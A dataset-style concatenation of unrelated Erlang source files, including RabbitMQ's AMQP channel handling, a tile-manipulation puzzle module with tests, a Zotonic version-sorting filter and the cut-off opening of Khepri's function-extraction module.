State = #state{return_handler = {_ReturnHandler, Ref}}) ->
erlang:demonitor(Ref),
{noreply, State#state{return_handler = none}};
%% @private
handle_cast({register_confirm_handler, ConfirmHandler}, State) ->
Ref = erlang:monitor(process, ConfirmHandler),
{noreply, State#state{confirm_handler = {ConfirmHandler, Ref}}};
%% @private
handle_cast(unregister_confirm_handler,
State = #state{confirm_handler = {_ConfirmHandler, Ref}}) ->
erlang:demonitor(Ref),
{noreply, State#state{confirm_handler = none}};
%% @private
handle_cast({register_flow_handler, FlowHandler}, State) ->
Ref = erlang:monitor(process, FlowHandler),
{noreply, State#state{flow_handler = {FlowHandler, Ref}}};
%% @private
handle_cast(unregister_flow_handler,
State = #state{flow_handler = {_FlowHandler, Ref}}) ->
erlang:demonitor(Ref),
{noreply, State#state{flow_handler = none}};
%% Received from channels manager
%% @private
handle_cast({method, Method, Content, noflow}, State) ->
handle_method_from_server(Method, Content, State);
%% Handles the situation when the connection closes without closing the channel
%% beforehand. The channel must block all further RPCs,
%% flush the RPC queue (optional), and terminate
%% @private
handle_cast({connection_closing, CloseType, Reason}, State) ->
handle_connection_closing(CloseType, Reason, State);
%% @private
handle_cast({shutdown, Shutdown}, State) ->
handle_shutdown(Shutdown, State).
%% Received from rabbit_channel in the direct case
%% @private
handle_info({send_command, Method}, State) ->
handle_method_from_server(Method, none, State);
%% Received from rabbit_channel in the direct case
%% @private
handle_info({send_command, Method, Content}, State) ->
handle_method_from_server(Method, Content, State);
%% Received from rabbit_channel in the direct case
%% @private
handle_info({send_command_and_notify, QPid, ChPid,
Method = #'basic.deliver'{}, Content},
State = #state{delivery_flow_control = MFC}) ->
case MFC of
false -> handle_method_from_server(Method, Content, State),
rabbit_amqqueue_common:notify_sent(QPid, ChPid);
true -> handle_method_from_server(Method, Content,
{self(), QPid, ChPid}, State)
end,
{noreply, State};
%% This comes from the writer or rabbit_channel
%% @private
handle_info({channel_exit, _ChNumber, Reason}, State) ->
handle_channel_exit(Reason, State);
%% This comes from rabbit_channel in the direct case
handle_info({channel_closing, ChPid}, State) ->
ok = rabbit_channel_common:ready_for_close(ChPid),
{noreply, State};
%% @private
handle_info({bump_credit, Msg}, State) ->
credit_flow:handle_bump_msg(Msg),
{noreply, State};
%% @private
handle_info(timed_out_flushing_channel, State) ->
?LOG_WARN("Channel (~p) closing: timed out flushing while "
"connection closing~n", [self()]),
{stop, timed_out_flushing_channel, State};
%% @private
handle_info({'DOWN', _, process, ReturnHandler, shutdown},
State = #state{return_handler = {ReturnHandler, _Ref}}) ->
{noreply, State#state{return_handler = none}};
handle_info({'DOWN', _, process, ReturnHandler, Reason},
State = #state{return_handler = {ReturnHandler, _Ref}}) ->
?LOG_WARN("Channel (~p): Unregistering return handler ~p because it died. "
"Reason: ~p~n", [self(), ReturnHandler, Reason]),
{noreply, State#state{return_handler = none}};
%% @private
handle_info({'DOWN', _, process, ConfirmHandler, shutdown},
State = #state{confirm_handler = {ConfirmHandler, _Ref}}) ->
{noreply, State#state{confirm_handler = none}};
handle_info({'DOWN', _, process, ConfirmHandler, Reason},
State = #state{confirm_handler = {ConfirmHandler, _Ref}}) ->
?LOG_WARN("Channel (~p): Unregistering confirm handler ~p because it died. "
"Reason: ~p~n", [self(), ConfirmHandler, Reason]),
{noreply, State#state{confirm_handler = none}};
%% @private
handle_info({'DOWN', _, process, FlowHandler, shutdown},
State = #state{flow_handler = {FlowHandler, _Ref}}) ->
{noreply, State#state{flow_handler = none}};
handle_info({'DOWN', _, process, FlowHandler, Reason},
State = #state{flow_handler = {FlowHandler, _Ref}}) ->
?LOG_WARN("Channel (~p): Unregistering flow handler ~p because it died. "
"Reason: ~p~n", [self(), FlowHandler, Reason]),
{noreply, State#state{flow_handler = none}};
handle_info({'DOWN', _, process, QPid, _Reason}, State) ->
rabbit_amqqueue_common:notify_sent_queue_down(QPid),
{noreply, State};
handle_info({confirm_timeout, From}, State = #state{waiting_set = WSet}) ->
case gb_trees:lookup(From, WSet) of
none ->
{noreply, State};
{value, _} ->
gen_server:reply(From, timeout),
{noreply, State#state{waiting_set = gb_trees:delete(From, WSet)}}
end.
%% @private
terminate(_Reason, State) ->
flush_writer(State),
State.
%% @private
code_change(_OldVsn, State, _Extra) ->
{ok, State}.
%%---------------------------------------------------------------------------
%% RPC mechanism
%%---------------------------------------------------------------------------
handle_method_to_server(Method, AmqpMsg, From, Sender, Flow,
State = #state{unconfirmed_set = USet}) ->
case {check_invalid_method(Method), From,
check_block(Method, AmqpMsg, State)} of
{ok, _, ok} ->
State1 = case {Method, State#state.next_pub_seqno} of
{#'confirm.select'{}, 0} ->
%% The confirm seqno is set to 1 on the
%% first confirm.select only.
State#state{next_pub_seqno = 1};
{#'basic.publish'{}, 0} ->
State;
{#'basic.publish'{}, SeqNo} ->
State#state{unconfirmed_set =
gb_sets:add(SeqNo, USet),
next_pub_seqno = SeqNo + 1};
_ ->
State
end,
{noreply, rpc_top_half(Method, build_content(AmqpMsg),
From, Sender, Flow, State1)};
{ok, none, BlockReply} ->
?LOG_WARN("Channel (~p): discarding method ~p in cast.~n"
"Reason: ~p~n", [self(), Method, BlockReply]),
{noreply, State};
{ok, _, BlockReply} ->
{reply, BlockReply, State};
{{_, InvalidMethodMessage}, none, _} ->
?LOG_WARN("Channel (~p): ignoring cast of ~p method. " ++
InvalidMethodMessage ++ "~n", [self(), Method]),
{noreply, State};
{{InvalidMethodReply, _}, _, _} ->
{reply, {error, InvalidMethodReply}, State}
end.
handle_close(Code, Text, From, State) ->
Close = #'channel.close'{reply_code = Code,
reply_text = Text,
class_id = 0,
method_id = 0},
case check_block(Close, none, State) of
ok -> {noreply, rpc_top_half(Close, none, From, none, noflow,
State)};
BlockReply -> {reply, BlockReply, State}
end.
rpc_top_half(Method, Content, From, Sender, Flow,
State0 = #state{rpc_requests = RequestQueue}) ->
State1 = State0#state{
rpc_requests = queue:in({From, Sender, Method, Content, Flow},
RequestQueue)},
IsFirstElement = queue:is_empty(RequestQueue),
if IsFirstElement -> do_rpc(State1);
true -> State1
end.
rpc_bottom_half(Reply, State = #state{rpc_requests = RequestQueue}) ->
{{value, {From, _Sender, _Method, _Content, _Flow}}, RequestQueue1} =
queue:out(RequestQueue),
case From of
none -> ok;
_ -> gen_server:reply(From, Reply)
end,
do_rpc(State#state{rpc_requests = RequestQueue1}).
do_rpc(State = #state{rpc_requests = Q,
closing = Closing}) ->
case queue:out(Q) of
{{value, {From, Sender, Method, Content, Flow}}, NewQ} ->
State1 = pre_do(Method, Content, Sender, State),
DoRet = do(Method, Content, Flow, State1),
case ?PROTOCOL:is_method_synchronous(Method) of
true -> State1;
false -> case {From, DoRet} of
{none, _} -> ok;
{_, ok} -> gen_server:reply(From, ok);
_ -> ok
%% Do not reply if error in do. Expecting
%% {channel_exit, _, _}
end,
do_rpc(State1#state{rpc_requests = NewQ})
end;
{empty, NewQ} ->
case Closing of
{connection, Reason} ->
gen_server:cast(self(),
{shutdown, {connection_closing, Reason}});
_ ->
ok
end,
State#state{rpc_requests = NewQ}
end.
pending_rpc_method(#state{rpc_requests = Q}) ->
{value, {_From, _Sender, Method, _Content, _Flow}} = queue:peek(Q),
Method.
pre_do(#'channel.close'{reply_code = Code, reply_text = Text}, none,
_Sender, State) ->
State#state{closing = {just_channel, {app_initiated_close, Code, Text}}};
pre_do(#'basic.consume'{} = Method, none, Sender, State) ->
ok = call_to_consumer(Method, Sender, State),
State;
pre_do(#'basic.cancel'{} = Method, none, Sender, State) ->
ok = call_to_consumer(Method, Sender, State),
State;
pre_do(_, _, _, State) ->
State.
%%---------------------------------------------------------------------------
%% Handling of methods from the server
%%---------------------------------------------------------------------------
safely_handle_method_from_server(Method, Content,
Continuation,
State = #state{closing = Closing}) ->
case is_connection_method(Method) of
true -> server_misbehaved(
#amqp_error{name = command_invalid,
explanation = "connection method on "
"non-zero channel",
method = element(1, Method)},
State);
false -> Drop = case {Closing, Method} of
{{just_channel, _}, #'channel.close'{}} -> false;
{{just_channel, _}, #'channel.close_ok'{}} -> false;
{{just_channel, _}, _} -> true;
_ -> false
end,
if Drop -> ?LOG_INFO("Channel (~p): dropping method ~p from "
"server because channel is closing~n",
[self(), {Method, Content}]),
{noreply, State};
true ->
Continuation()
end
end.
handle_method_from_server(Method, Content, State) ->
Fun = fun () ->
handle_method_from_server1(Method,
amqp_msg(Content), State)
end,
safely_handle_method_from_server(Method, Content, Fun, State).
handle_method_from_server(Method = #'basic.deliver'{},
Content, DeliveryCtx, State) ->
Fun = fun () ->
handle_method_from_server1(Method,
amqp_msg(Content),
DeliveryCtx,
State)
end,
safely_handle_method_from_server(Method, Content, Fun, State).
handle_method_from_server1(#'channel.open_ok'{}, none, State) ->
{noreply, rpc_bottom_half(ok, State)};
handle_method_from_server1(#'channel.close'{reply_code = Code,
reply_text = Text},
none,
State = #state{closing = {just_channel, _}}) ->
%% Both client and server sent close at the same time. Don't shutdown yet,
%% wait for close_ok.
do(#'channel.close_ok'{}, none, noflow, State),
{noreply,
State#state{
closing = {just_channel, {server_initiated_close, Code, Text}}}};
handle_method_from_server1(#'channel.close'{reply_code = Code,
reply_text = Text}, none, State) ->
do(#'channel.close_ok'{}, none, noflow, State),
handle_shutdown({server_initiated_close, Code, Text}, State);
handle_method_from_server1(#'channel.close_ok'{}, none,
State = #state{closing = Closing}) ->
case Closing of
{just_channel, {app_initiated_close, _, _} = Reason} ->
handle_shutdown(Reason, rpc_bottom_half(ok, State));
{just_channel, {server_initiated_close, _, _} = Reason} ->
handle_shutdown(Reason,
rpc_bottom_half(closing, State));
{connection, Reason} ->
handle_shutdown({connection_closing, Reason}, State)
end;
handle_method_from_server1(#'basic.consume_ok'{} = ConsumeOk, none, State) ->
Consume = #'basic.consume'{} = pending_rpc_method(State),
ok = call_to_consumer(ConsumeOk, Consume, State),
{noreply, rpc_bottom_half(ConsumeOk, State)};
handle_method_from_server1(#'basic.cancel_ok'{} = CancelOk, none, State) ->
Cancel = #'basic.cancel'{} = pending_rpc_method(State),
ok = call_to_consumer(CancelOk, Cancel, State),
{noreply, rpc_bottom_half(CancelOk, State)};
handle_method_from_server1(#'basic.cancel'{} = Cancel, none, State) ->
ok = call_to_consumer(Cancel, none, State),
{noreply, State};
handle_method_from_server1(#'basic.deliver'{} = Deliver, AmqpMsg, State) ->
ok = call_to_consumer(Deliver, AmqpMsg, State),
{noreply, State};
handle_method_from_server1(#'channel.flow'{active = Active} = Flow, none,
State = #state{flow_handler = FlowHandler}) ->
case FlowHandler of none -> ok;
{Pid, _Ref} -> Pid ! Flow
end,
%% Putting the flow_ok in the queue so that the RPC queue can be
%% flushed beforehand. Methods that made it to the queue are not
%% blocked in any circumstance.
{noreply, rpc_top_half(#'channel.flow_ok'{active = Active}, none, none,
none, noflow, State#state{flow_active = Active})};
handle_method_from_server1(
#'basic.return'{} = BasicReturn, AmqpMsg,
State = #state{return_handler = ReturnHandler}) ->
case ReturnHandler of
none -> ?LOG_WARN("Channel (~p): received {~p, ~p} but there is "
"no return handler registered~n",
[self(), BasicReturn, AmqpMsg]);
{Pid, _Ref} -> Pid ! {BasicReturn, AmqpMsg}
end,
{noreply, State};
handle_method_from_server1(#'basic.ack'{} = BasicAck, none,
#state{confirm_handler = none} = State) ->
{noreply, update_confirm_set(BasicAck, State)};
handle_method_from_server1(#'basic.ack'{} = BasicAck, none,
#state{confirm_handler = {CH, _Ref}} = State) ->
CH ! BasicAck,
{noreply, update_confirm_set(BasicAck, State)};
handle_method_from_server1(#'basic.nack'{} = BasicNack, none,
#state{confirm_handler = none} = State) ->
?LOG_WARN("Channel (~p): received ~p but there is no "
"confirm handler registered~n", [self(), BasicNack]),
{noreply, update_confirm_set(BasicNack, State)};
handle_method_from_server1(#'basic.nack'{} = BasicNack, none,
#state{confirm_handler = {CH, _Ref}} = State) ->
CH ! BasicNack,
{noreply, update_confirm_set(BasicNack, State)};
handle_method_from_server1(#'basic.credit_drained'{} = CreditDrained, none,
#state{consumer = Consumer} = State) ->
Consumer ! CreditDrained,
{noreply, State};
handle_method_from_server1(Method, none, State) ->
{noreply, rpc_bottom_half(Method, State)};
handle_method_from_server1(Method, Content, State) ->
{noreply, rpc_bottom_half({Method, Content}, State)}.
%% only used with manual consumer-to-queue flow control
handle_method_from_server1(#'basic.deliver'{} = Deliver, AmqpMsg,
DeliveryCtx, State) ->
ok = call_to_consumer(Deliver, AmqpMsg, DeliveryCtx, State),
{noreply, State}.
%%---------------------------------------------------------------------------
%% Other handle_* functions
%%---------------------------------------------------------------------------
handle_connection_closing(CloseType, Reason,
State = #state{rpc_requests = RpcQueue,
closing = Closing}) ->
NewState = State#state{closing = {connection, Reason}},
case {CloseType, Closing, queue:is_empty(RpcQueue)} of
{flush, false, false} ->
erlang:send_after(?TIMEOUT_FLUSH, self(),
timed_out_flushing_channel),
{noreply, NewState};
{flush, {just_channel, _}, false} ->
{noreply, NewState};
_ ->
handle_shutdown({connection_closing, Reason}, NewState)
end.
handle_channel_exit(Reason = #amqp_error{name = ErrorName, explanation = Expl},
State = #state{connection = Connection, number = Number}) ->
%% Sent by rabbit_channel for hard errors in the direct case
?LOG_ERR("connection ~p, channel ~p - error:~n~p~n",
[Connection, Number, Reason]),
{true, Code, _} = ?PROTOCOL:lookup_amqp_exception(ErrorName),
ReportedReason = {server_initiated_close, Code, Expl},
amqp_gen_connection:hard_error_in_channel(
Connection, self(), ReportedReason),
handle_shutdown({connection_closing, ReportedReason}, State);
handle_channel_exit(Reason, State) ->
%% Unexpected death of a channel infrastructure process
{stop, {infrastructure_died, Reason}, State}.
handle_shutdown({_, 200, _}, State) ->
{stop, normal, State};
handle_shutdown({connection_closing, {_, 200, _}}, State) ->
{stop, normal, State};
handle_shutdown({connection_closing, normal}, State) ->
{stop, normal, State};
handle_shutdown(Reason, State) ->
{stop, {shutdown, Reason}, State}.
%%---------------------------------------------------------------------------
%% Internal plumbing
%%---------------------------------------------------------------------------
do(Method, Content, Flow, #state{driver = network, writer = W}) ->
%% Catching because it expects the {channel_exit, _, _} message on error
catch case {Content, Flow} of
{none, _} -> rabbit_writer:send_command(W, Method);
{_, flow} -> rabbit_writer:send_command_flow(W, Method,
Content);
{_, noflow} -> rabbit_writer:send_command(W, Method, Content)
end;
do(Method, Content, Flow, #state{driver = direct, writer = W}) ->
%% ditto catching because...
catch case {Content, Flow} of
{none, _} -> rabbit_channel_common:do(W, Method);
{_, flow} -> rabbit_channel_common:do_flow(W, Method, Content);
{_, noflow} -> rabbit_channel_common:do(W, Method, Content)
end.
flush_writer(#state{driver = network, writer = Writer}) ->
try
rabbit_writer:flush(Writer)
catch
exit:noproc -> ok
end;
flush_writer(#state{driver = direct}) ->
ok.
amqp_msg(none) ->
none;
amqp_msg(Content) ->
{Props, Payload} = rabbit_basic_common:from_content(Content),
#amqp_msg{props = Props, payload = Payload}.
build_content(none) ->
none;
build_content(#amqp_msg{props = Props, payload = Payload}) ->
rabbit_basic_common:build_content(Props, Payload).
check_block(_Method, _AmqpMsg, #state{closing = {just_channel, _}}) ->
closing;
check_block(_Method, _AmqpMsg, #state{closing = {connection, _}}) ->
closing;
check_block(_Method, none, #state{}) ->
ok;
check_block(_Method, #amqp_msg{}, #state{flow_active = false}) ->
blocked;
check_block(_Method, _AmqpMsg, #state{}) ->
ok.
check_invalid_method(#'channel.open'{}) ->
{use_amqp_connection_module,
"Use amqp_connection:open_channel/{1,2} instead"};
check_invalid_method(#'channel.close'{}) ->
{use_close_function, "Use close/{1,3} instead"};
check_invalid_method(Method) ->
case is_connection_method(Method) of
true -> {connection_methods_not_allowed,
"Sending connection methods is not allowed"};
false -> ok
end.
is_connection_method(Method) ->
{ClassId, _} = ?PROTOCOL:method_id(element(1, Method)),
?PROTOCOL:lookup_class_name(ClassId) == connection.
server_misbehaved(#amqp_error{} = AmqpError, State = #state{number = Number}) ->
case rabbit_binary_generator:map_exception(Number, AmqpError, ?PROTOCOL) of
{0, _} ->
handle_shutdown({server_misbehaved, AmqpError}, State);
{_, Close} ->
?LOG_WARN("Channel (~p) flushing and closing due to soft "
"error caused by the server ~p~n", [self(), AmqpError]),
Self = self(),
spawn(fun () -> call(Self, Close) end),
{noreply, State}
end.
update_confirm_set(#'basic.ack'{delivery_tag = SeqNo,
multiple = Multiple},
State = #state{unconfirmed_set = USet}) ->
maybe_notify_waiters(
State#state{unconfirmed_set =
update_unconfirmed(SeqNo, Multiple, USet)});
update_confirm_set(#'basic.nack'{delivery_tag = SeqNo,
multiple = Multiple},
State = #state{unconfirmed_set = USet}) ->
maybe_notify_waiters(
State#state{unconfirmed_set = update_unconfirmed(SeqNo, Multiple, USet),
only_acks_received = false}).
update_unconfirmed(SeqNo, false, USet) ->
gb_sets:del_element(SeqNo, USet);
update_unconfirmed(SeqNo, true, USet) ->
case gb_sets:is_empty(USet) of
true -> USet;
false -> {S, USet1} = gb_sets:take_smallest(USet),
case S > SeqNo of
true -> USet;
false -> update_unconfirmed(SeqNo, true, USet1)
end
end.
maybe_notify_waiters(State = #state{unconfirmed_set = USet}) ->
case gb_sets:is_empty(USet) of
false -> State;
true -> notify_confirm_waiters(State)
end.
notify_confirm_waiters(State = #state{waiting_set = WSet,
only_acks_received = OAR}) ->
[begin
safe_cancel_timer(TRef),
gen_server:reply(From, OAR)
end || {From, TRef} <- gb_trees:to_list(WSet)],
State#state{waiting_set = gb_trees:empty(),
only_acks_received = true}.
handle_wait_for_confirms(_From, _Timeout, State = #state{next_pub_seqno = 0}) ->
{reply, {error, not_in_confirm_mode}, State};
handle_wait_for_confirms(From, Timeout,
State = #state{unconfirmed_set = USet,
waiting_set = WSet}) ->
case gb_sets:is_empty(USet) of
true -> {reply, true, State};
false -> TRef = case Timeout of
infinity -> undefined;
_ -> erlang:send_after(
Timeout * 1000, self(),
{confirm_timeout, From})
end,
{noreply,
State#state{waiting_set = gb_trees:insert(From, TRef, WSet)}}
end.
call_to_consumer(Method, Args, #state{consumer = Consumer}) ->
amqp_gen_consumer:call_consumer(Consumer, Method, Args).
call_to_consumer(Method, Args, DeliveryCtx, #state{consumer = Consumer}) ->
amqp_gen_consumer:call_consumer(Consumer, Method, Args, DeliveryCtx).
safe_cancel_timer(undefined) -> ok;
safe_cancel_timer(TRef) -> erlang:cancel_timer(TRef). | erlang_server/_build/default/lib/amqp_client/src/amqp_channel.erl | 0.770551 | 0.437523 | amqp_channel.erl | starcoder |
%%% ----------------------------------------------------------------------------
%%% @author <<EMAIL>>
%%% @doc
%%% Library for creating dynamic module which its functions yield atoms.
%%% @end
%% -----------------------------------------------------------------------------
-module(returnatom).
-author("<EMAIL>").
%% -----------------------------------------------------------------------------
%% Exports:
%% API:
-export([start/0
,stop/0
,start/1
,stop/1
,add/3
,replace/3
,delete/2
,modules/0
,start_link/1
,stop_link/1]).
%% -----------------------------------------------------------------------------
%% API:
-spec
start() ->
ok | {error, term()}.
%% @doc
%% Starts returnatom application.
%% @end
start() ->
application:start(returnatom).
-spec
stop() ->
ok.
%% @doc
%% Stops returnatom application.
%% @end
stop() ->
application:stop(returnatom).
-spec
start(atom()) ->
ok.
%% @doc
%% Starts a compiler server under root supervisor.
%% @end
start(Mod) when erlang:is_atom(Mod) ->
returnatom_sup:start(Mod).
-spec
stop(atom()) ->
ok | {error, term()}.
%% @doc
%% Stops a compiler server from root supervisor.
%% @end
stop(Mod) when erlang:is_atom(Mod) ->
returnatom_sup:stop(Mod).
-spec
add(atom(), atom(), atom()) ->
ok | {error, term()}.
%% @doc
%% Adds a function with specified return value to available module.<br/>
%% Note that if function exists, it does not replace it.
%% @end
add(Name, Func, ReturnAtom) ->
returnatom_server:add(Name, Func, ReturnAtom).
-spec
replace(atom(), atom(), atom()) ->
ok | {error, term()}.
%% @doc
%% Adds a function with specified return value to available module or
%% replace it if exists.
%% @end
replace(Name, Func, ReturnAtom) ->
returnatom_server:replace(Name, Func, ReturnAtom).
-spec
delete(atom(), atom()) ->
ok | {error, term()}.
%% @doc
%% Deletes a function from module if exists.
%% @end
delete(Name, Func) ->
returnatom_server:delete(Name, Func).
-spec
modules() ->
[module()] | [].
%% @doc
%% Gives list of available modules which their server processes are under
%% root supervision.
%% @end
modules() ->
returnatom_sup:modules().
-spec
start_link(module()) ->
{ok, pid()} | {error, term()}.
%% @doc
%% Starts and links server process to caller. Note that server process will
%% be registered with module name locally.
%% @end
start_link(Mod) ->
returnatom_server:start_link(Mod).
-spec
stop_link(atom()) ->
ok.
%% @doc
%% Stops a server process directly.
%% @end
stop_link(Name) ->
returnatom_server:stop(Name). | src/returnatom.erl | 0.52902 | 0.449211 | returnatom.erl | starcoder |
-module(tile).
-export([load/1, parse/1, size/1, at/3, rotate/2, flip/1, print/1, print_one/1]).
-export([left/1, right/1, top/1, bottom/1, merge/1]).
-include_lib("eunit/include/eunit.hrl").
-record(tile, {rows}).
% Loads input from the given filename.
load(Filename) ->
{ok, File} = file:open(Filename, [read]),
{ok, Text} = file:read(File, 1024*1024),
parse(string:split(Text, "\n", all)).
% Parses a set of input lines into a map from tile ID to tile data.
parse(Lines) -> parse(Lines, undefined, #{}).
parse([Line | Rest], undefined, Acc) ->
{ID, _} = string:take(string:prefix(Line, "Tile "), "0123456789"),
parse(Rest, {list_to_integer(ID), []}, Acc);
parse([Line | Rest], {ID, Rows}, Acc) when length(Line) > 0 ->
parse(Rest, {ID, [Line | Rows]}, Acc);
parse(["" | Rest], {ID, Rows}, Acc) ->
parse(Rest, undefined, Acc#{ ID => #tile{rows=lists:reverse(Rows)} });
parse([], Tile, Acc) when Tile /= undefined -> parse([""], Tile, Acc);
parse([], undefined, Acc) -> Acc.
% Returns the size of the tile.
size({rotate, _, Tile}) -> tile:size(Tile);
size({flip, Tile}) -> tile:size(Tile);
size(Tile) -> length(Tile#tile.rows).
% Returns the character at position X, Y on the tile.
at({rotate, D, Tile}, X, Y) ->
Max = tile:size(Tile) + 1,
{XP, YP} = case D of
90 -> { Y, Max - X};
180 -> {Max - X, Max - Y};
270 -> {Max - Y, X}
end,
at(Tile, XP, YP);
at({flip, Tile}, X, Y) ->
Max = tile:size(Tile) + 1,
at(Tile, Max - X, Y);
at( Tile, X, Y) ->
lists:nth(X, lists:nth(Y, Tile#tile.rows)).
% Rotates a tile clockwise D degrees.
rotate(Tile, D) -> {rotate, D, Tile}.
% Flips a tile over horizontally.
flip(Tile) -> {flip, Tile}.
% Helpers to access the edges of the tile.
top(Tile) ->
Max = tile:size(Tile),
lists:map(fun (X) -> at(Tile, X, 1) end, lists:seq(1, Max)).
bottom(Tile) ->
Max = tile:size(Tile),
lists:map(fun (X) -> at(Tile, X, Max) end, lists:seq(1, Max)).
left(Tile) ->
Max = tile:size(Tile),
lists:map(fun (Y) -> at(Tile, 1, Y) end, lists:seq(1, Max)).
right(Tile) ->
Max = tile:size(Tile),
lists:map(fun (Y) -> at(Tile, Max, Y) end, lists:seq(1, Max)).
row(Tile, Y) ->
lists:map(fun (X) -> at(Tile, X, Y) end, lists:seq(1, tile:size(Tile))).
% Merges a grid of tiles into a single super-tile.
merge(Tiles) ->
Rows = lists:flatmap(fun (Row) -> merge_row(Row) end, Tiles),
#tile{rows = lists:reverse(Rows)}.
% Merges a horizontal row of tiles into a set of horizontal rows of pixels.
merge_row(Tiles) ->
lists:map(fun (Y) ->
merge_row(Tiles, Y)
end, lists:seq(2, tile:size(hd(Tiles))-1)).
% Merges a single Y line across multiple tiles.
merge_row(Tiles, Y) ->
lists:flatmap(fun (Tile) ->
Row = row(Tile, Y),
lists:sublist(Row, 2, length(Row)-1)
end, Tiles).
% Prints a sequence of tiles.
print(Tiles) ->
lists:foreach(fun (Y) ->
print_row(Tiles, Y)
end, lists:seq(1, tile:size(hd(Tiles)))).
print_row([Tile | Rest], Y) ->
print_one_row(Tile, Y),
io:format(" "),
print_row(Rest, Y);
print_row([], _) -> io:format("~n").
print_one(Tile) ->
Seq = lists:seq(1, tile:size(Tile)),
lists:foreach(fun (Y) ->
print_one_row(Tile, Y),
io:format("~n")
end, Seq).
print_one_row(Tile, Y) ->
lists:foreach(fun (X) ->
io:format("~c", [at(Tile, X, Y)])
end, lists:seq(1, tile:size(Tile))).
-ifdef(TEST).
test_tile() ->
Tiles = parse([
"Tile 2311:",
"..##.#..#.",
"##..#.....",
"#...##..#.",
"####.#...#",
"##.##.###.",
"##...#.###",
".#.#.#..##",
"..#....#..",
"###...#.#.",
"..###..###"
]),
maps:get(2311, Tiles).
at_test() ->
Tile = test_tile(),
?assertEqual($., at(Tile, 1, 1)),
?assertEqual($., at(Tile, 2, 1)),
?assertEqual($#, at(Tile, 3, 1)),
?assertEqual($#, at(Tile, 1, 2)).
edges_test() ->
Tile = test_tile(),
?assertEqual("..##.#..#.", top(Tile)),
?assertEqual(".#####..#.", left(Tile)),
?assertEqual("...#.##..#", right(Tile)),
?assertEqual("..###..###", bottom(Tile)).
flip_test() ->
Tile = flip(test_tile()),
?assertEqual(".#..#.##..", top(Tile)),
?assertEqual("...#.##..#", left(Tile)).
rotate_test() ->
Tile = rotate(test_tile(), 90),
?assertEqual(".#..#####.", top(Tile)),
?assertEqual("..##.#..#.", right(Tile)).
-endif. | day20/tile.erl | 0.516839 | 0.591251 | tile.erl | starcoder |
%% @author <NAME> <<EMAIL>>
%% @copyright 2021 <NAME>
%% @doc Template filter for sorting release note resources on their version number.
%% Copyright 2021 <NAME>
%%
%% Licensed under the Apache License, Version 2.0 (the "License");
%% you may not use this file except in compliance with the License.
%% You may obtain a copy of the License at
%%
%% http://www.apache.org/licenses/LICENSE-2.0
%%
%% Unless required by applicable law or agreed to in writing, software
%% distributed under the License is distributed on an "AS IS" BASIS,
%% WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
%% See the License for the specific language governing permissions and
%% limitations under the License.
% The module name of a filter MUST start with 'filter_'
% It is good habit to prefix the filter with the name of the module or site.
% In this way a name clash with other modules and sites is prevented.
-module(filter_zotonicwww2_by_version).
-export([
% The name of the filter MUST be used as the entry point.
zotonicwww2_by_version/2
]).
-include_lib("zotonic_core/include/zotonic.hrl").
% The /2 version is for filters without extra arguments. This filter
% is used in a template like:
%
% {{ ids|zotonicwww2_by_version }}
%
zotonicwww2_by_version(undefined, _Context) ->
[];
zotonicwww2_by_version(List, Context) when is_list(List) ->
Vs = lists:map(
fun(Id) ->
{version(Id, Context), Id}
end,
List),
% Highest version number first, so reverse after sorting
{_, Ids1} = lists:unzip( lists:reverse(lists:sort(Vs)) ),
Ids1.
version(Id, Context) ->
% Request the title of the release note, without checking access control
Title = m_rsc:p_no_acl(Id, title, Context),
% Titles are translatable and can be:
% - a #trans{} record
% - a binary (utf8 encoded)
% - undefined
%
% The z_trans:lookup_fallback/2 call maps a #trans{} record to the
% binary in the correct language.
Title1 = z_trans:lookup_fallback(Title, Context),
vsn(Title1).
% Release note titles are always of the form: "Release 9.9.9"
% Map this to integers for easy sorting.
vsn(undefined) ->
[];
vsn(<<"Release ", Vsn/binary>>) ->
vsn(Vsn);
vsn(<<"Notes", _/binary>>) ->
[100000];
vsn(Vsn) ->
Vs = binary:split( z_string:trim(Vsn), <<".">>, [ global ]),
lists:map(
fun(N) ->
try z_convert:to_integer(N)
catch _:_ -> N
end
end,
Vs). | src/filters/filter_zotonicwww2_by_version.erl | 0.543348 | 0.434281 | filter_zotonicwww2_by_version.erl | starcoder |
%% This Source Code Form is subject to the terms of the Mozilla Public
%% License, v. 2.0. If a copy of the MPL was not distributed with this
%% file, You can obtain one at https://mozilla.org/MPL/2.0/.
%%
%% Copyright (c) 2021-2022 VMware, Inc. or its affiliates. All rights reserved.
%%
%% @doc Anonymous function extraction API.
%%
%% This module is responsible for extracting the code of an anonymous function.
%% The goal is to be able to store the extracted function and execute it later,
%% regardless of the availability of the initial Erlang module which declared
%% it.
%%
%% This module also provides a way for the caller to indicate forbidden
%% operations or function calls.
%%
%% This module works on assembly code to perform all checks and prepare the
%% storable copy of a function. It uses {@link beam_disasm:file/1} from the
%% `compiler' application to extract the assembly code. After the assembly
%% code was extracted and modified, the compiler is used again to compile the
%% code back to an executable module.
%%
%% If the anonymous function calls other functions, either in the same module
%% or in another one, the code of the called functions is extracted and copied
%% as well. This is to make sure the result is completely standalone.
%%
%% To avoid any copies of standard Erlang APIs or Khepri itself, it is
%% possible to specify a list of modules which should not be copied. In this
%% case, calls to functions in those modules are left unmodified.
%%
%% Once the code was extracted and verified, a new module is generated as an
%% "assembly form", ready to be compiled again to an executable module. The
%% generated module has a single `run/N' function. This function contains the
%% code of the extracted anonymous function.
%%
%% Because this process works on the assembly code, it means that if the
%% initial module hosting the anonymous function was compiled with Erlang
%% version N, it will probably not compile or run on older versions of Erlang.
%% The reason is that a newer compiler may use instructions which are unknown
%% to older runtimes.
%%
%% There is a special treatment for anonymous functions evaluated by
%% `erl_eval' (e.g. in the Erlang shell). "erl_eval functions" are lambdas
%% parsed from text and are evaluated using `erl_eval'.
%%
%% This kind of lambdas becomes a local function in the `erl_eval' module.
%%
%% Their assembly code isn't available in the `erl_eval' module. However, the
%% abstract code (i.e. after parsing but before compilation) is available in
%% the `env'. We compile that abstract code and extract the assembly from that
%% compiled beam.
-module(khepri_fun).
-include_lib("kernel/include/logger.hrl").
-include_lib("stdlib/include/assert.hrl").
-include("src/internal.hrl").
-export([to_standalone_fun/2,
exec/2]).
%% FIXME: compile:forms/2 is incorrectly specified and doesn't accept
%% assembly. This breaks compile/1 and causes a cascade of errors.
%%
%% The following basically disable Dialyzer for this module unfortunately...
%% This can be removed once we start using Erlang 25 to run Dialyzer.
-dialyzer({nowarn_function, [compile/1,
to_standalone_fun/2,
to_standalone_fun1/2,
to_standalone_fun2/2,
to_standalone_env/1,
to_standalone_arg/2,
handle_compilation_error/2,
